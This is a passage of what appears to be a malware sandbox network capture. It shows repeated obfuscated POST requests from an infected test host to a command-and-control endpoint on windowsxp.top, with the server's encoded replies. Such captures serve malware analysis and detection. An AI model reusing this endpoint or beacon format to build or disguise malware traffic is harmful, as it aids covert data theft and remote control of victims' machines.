                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  125192.168.2.450138188.114.97.380
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:37.030648947 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:37.383734941 CET1012OUTData Raw: 50 51 5d 5e 5b 58 56 57 54 58 57 54 54 5d 5b 58 59 51 5b 58 52 57 52 59 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PQ]^[XVWTXWTT][XYQ[XRWRYT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'%>+!9&66Z9$]$,.R(<< T,/=<*<9/!Y##X(
                                                                                                                  Oct 27, 2024 19:24:37.635092974 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:38.053174019 CET775INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:37 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DFl8rg9FQOM0A8kpCvk2wwsh%2BEv0U82PvDXljF8H3UjvdBG41ZUb8KvuIP5LeWR2Lj%2FuKNO%2Fzwr0N3%2BFPubeuPDeGgNsZ7%2BZTqwTI6QkwmYhmdpEwy3THmbnFAitbP2U"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b95addee83a4-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2358&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=611486&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  126192.168.2.450139188.114.97.380
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:37.110658884 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1716
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:37.461842060 CET1716OUTData Raw: 55 51 58 5d 5e 53 56 51 54 58 57 54 54 53 5b 58 59 50 5b 5c 52 56 52 5a 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UQX]^SVQTXWTTS[XYP[\RVRZT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'&.,[ *!"4\: X'^7/X<U(,7 ,='Z>,".!Y##X(;
                                                                                                                  Oct 27, 2024 19:24:37.705276966 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:38.041583061 CET919INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:37 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cMokWOgVghcHDhSyNMYIQaTIjWYr98otN0RjLa5CIWAKMd9tfm72IZOvnXr44zQDMVAt1n%2BzuTLvwmxAJfER%2BlOof1sJQm8azC1BF0HIzMqswLqYI1wzzkELmrToklWs"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b95b4abfeac1-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1098&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2037&delivery_rate=1315168&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1a 22 59 34 58 3f 0a 29 12 25 1c 2a 08 25 5f 30 2c 03 5d 3b 0c 0a 1c 2a 03 18 0e 2e 16 0c 57 27 0a 3a 18 3f 17 2b 03 37 3e 02 54 3e 25 21 5e 00 1c 24 03 22 00 25 56 27 3b 0a 5a 25 23 3c 5d 22 5b 37 5e 29 3d 3a 09 3f 07 20 5f 3c 06 0e 0d 38 06 3a 08 25 39 3e 13 38 06 03 07 3e 3a 2a 54 0c 14 22 03 2e 3f 3f 02 21 08 29 54 3d 0c 16 5d 27 3e 20 56 27 3a 24 53 29 3c 2f 59 28 2d 21 10 22 2c 01 00 2b 28 21 02 33 3e 2b 59 29 2e 22 54 22 0e 29 53 0f 30 59 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98"Y4X?)%*%_0,];*.W':?+7>T>%!^$"%V';Z%#<]"[7^)=:? _<8:%9>8>:*T".??!)T=]'> V':$S)</Y(-!",+(!3>+Y)."T")S0YP0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  127192.168.2.450140188.114.97.380
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:38.182768106 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:38.539916039 CET1012OUTData Raw: 50 51 5d 58 5b 5f 56 5f 54 58 57 54 54 52 5b 53 59 5a 5b 5c 52 51 52 5e 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PQ]X[_V_TXWTTR[SYZ[\RQR^T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'\1>' )=]!<Z-B $(?8,U=,'##^,-):.!Y##X(
                                                                                                                  Oct 27, 2024 19:24:38.792627096 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:38.999443054 CET775INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:38 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BI%2FAWxTMHYNE0UECs1LZdC2hxSpAh0nMLyTFTk%2F%2FHu%2Fl5Jss5vrLmO1YNPSq002%2Bl4F1EvLJLudbRj9uNG90KO0hCerRQEKKT7NKq3loI5AGQdpE83I7NnfXPlsZCK0n"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b96219820c1b-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1358&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1124223&cwnd=75&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  128192.168.2.450141188.114.97.380
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:39.165503979 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:39.524322987 CET1012OUTData Raw: 50 57 58 5d 5b 5e 53 57 54 58 57 54 54 57 5b 5c 59 5f 5b 5f 52 5e 52 5f 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PWX][^SWTXWTTW[\Y_[_R^R_T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'Z&4!\)Y#&$[:$X'$V,(T),+#";Y/?[>:^,?!Y##X(+
                                                                                                                  Oct 27, 2024 19:24:39.762197971 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:39.974361897 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:40.057790041 CET778INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:39 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4JPJesI%2FGYuHstXZQ%2FlLodoEcQ69oN525Wcoc24qkg5tpbGVRB6QGf1AvrEg7%2FUbChmXXS3BRDoTPRFbJAArI%2FMnG6j%2FbbwK%2BRYpLuMHATNPI7fD2s4VJax674RNwDYs"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b9682ca12d2b-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1390&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1058479&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  129192.168.2.450142188.114.97.380
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:40.186578989 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:40.543329000 CET1012OUTData Raw: 50 55 5d 5e 5e 5f 53 57 54 58 57 54 54 51 5b 5f 59 59 5b 5c 52 5f 52 5c 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PU]^^_SWTXWTTQ[_YY[\R_R\T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY']%$_":5;94_'<P8$S><?#"'Z8-X=.X./!Y##X(3
                                                                                                                  Oct 27, 2024 19:24:40.792278051 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:40.989537954 CET775INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:40 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=47NGGnZMfy%2Bv3N74kEybuGvabauPl95ko%2F7G8ncwqYwr91c%2FE6%2BHjT3hnA11nm3pQNLRFcIW34jek4JD1zHVB1YRMuNZWZdS3earLzlCbNxbpe2fKsvQ6P88Wimj%2BOd9"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b96e9fb5477c-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1762&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=825071&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  130192.168.2.450143188.114.97.380
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:41.123420954 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:41.477436066 CET1012OUTData Raw: 55 51 58 5b 5b 5c 56 5e 54 58 57 54 54 5d 5b 5f 59 5a 5b 50 52 53 52 5d 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UQX[[\V^TXWTT][_YZ[PRSR]T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'Y&,5#&?-4,]$78')7$8.4*,),/!Y##X(
                                                                                                                  Oct 27, 2024 19:24:41.733697891 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:42.065052032 CET777INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:42 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PphdoQCZVMkQMeM3XoBM4V7Xw5vhLYa3I1IL%2F4SpHwZ9OCrUBIBUBIYL2xlzy%2BvyZjxO%2FEiyBfvh%2FpRBa8tId8JTf2cK6KKF5sKgD%2F10Pjp4IWcwdsjgo6kuK%2Fd50Wih"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b9747b1b2c9f-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1158&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1296329&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  131192.168.2.450144188.114.97.380
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:42.364132881 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:42.715358973 CET1012OUTData Raw: 50 55 58 5b 5b 5c 56 54 54 58 57 54 54 53 5b 5e 59 5f 5b 51 52 54 52 59 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PUX[[\VTTXWTTS[^Y_[QRTRYT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$%= 6"65?:$#0?/S)##28-*?:[-!Y##X(;
                                                                                                                  Oct 27, 2024 19:24:42.984479904 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:43.290718079 CET772INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:43 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BMnnd5SFWGBwUsbm5mX2S8jj%2Bpco1T3ocgRL3BKBhrxDj1hKQIRZT851q1rrBDeglu9Nn2yHEWKZmLiChMLk%2FsQgE1jWdGkTp0f%2FOFcrOEjKIE3TUZ1lgiBxOIkmciTe"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b97c4bcb2d39-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1136&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1243986&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  132192.168.2.450145188.114.97.380
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:43.069143057 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1704
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:43.415075064 CET1704OUTData Raw: 50 52 5d 5c 5e 5c 56 54 54 58 57 54 54 55 5b 5e 59 5b 5b 58 52 57 52 52 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PR]\^\VTTXWTTU[^Y[[XRWRRT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$'>,"5!$^97,08 W/7(,<4/_8=4**Z./!Y##X(3
                                                                                                                  Oct 27, 2024 19:24:43.667609930 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:43.871519089 CET917INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:43 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=70KON6bOkWuSdUt51jbBNeTOgIZQInIt7GYOfazvZpeCfbxl3sZzVNfj4n58JMDZ2fdloS7cWuKz9%2FRHldGTQ8eolX3XwxzBiDybYCG74i5qsD1y3AD2vuKuC9Eh6Dsi"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b9808f20e7c7-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1374&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2025&delivery_rate=1097801&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1a 21 07 23 10 02 56 2a 05 3d 54 3d 21 2a 00 27 02 3d 1e 2e 22 2f 01 28 2d 1c 0f 2d 01 25 0f 27 1d 39 44 3c 2a 24 11 20 3e 38 57 2a 0f 21 5e 00 1c 24 05 22 10 03 56 31 02 38 5a 27 20 02 5f 22 3d 15 17 2a 2d 22 08 3f 2a 2c 1d 3e 2b 27 53 3b 3c 3e 0f 25 17 03 00 2c 06 2a 5f 28 10 2a 54 0c 14 21 59 2e 2f 1a 5f 36 31 35 56 3d 31 27 05 27 3e 01 0a 24 5c 30 53 28 2c 0a 06 29 2d 3e 05 21 3c 0e 11 28 28 3a 5d 25 2d 2b 1e 3d 3e 22 54 22 0e 29 53 0f 30 59 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98!#V*=T=!*'=."/(--%'9D<*$ >8W*!^$"V18Z' _"=*-"?*,>+'S;<>%,*_(*T!Y./_615V=1''>$\0S(,)->!<((:]%-+=>"T")S0YP0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  133192.168.2.450146188.114.97.380
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:43.421741962 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:43.774360895 CET1012OUTData Raw: 55 5b 58 5e 5e 5a 56 53 54 58 57 54 54 56 5b 5f 59 58 5b 5f 52 53 52 5e 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: U[X^^ZVSTXWTTV[_YX[_RSR^T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY']2>' :^"$Z94_$((;'>Y;""8-<>9-!Y##X(/
                                                                                                                  Oct 27, 2024 19:24:44.026223898 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:44.227874994 CET778INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:44 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sveAT0nvD4RtN2r8AnkYT1D2irJdx%2BjQjT2%2FDS7li2JADjvzd30i9enQCuySTlqH6ff3dz8OvoHCZ1gI2g%2Fi%2F2bFb0C%2BF87yxRSF%2FhsCDZwVdma2aT14hSVcfxY997g1"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b982cabd4857-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
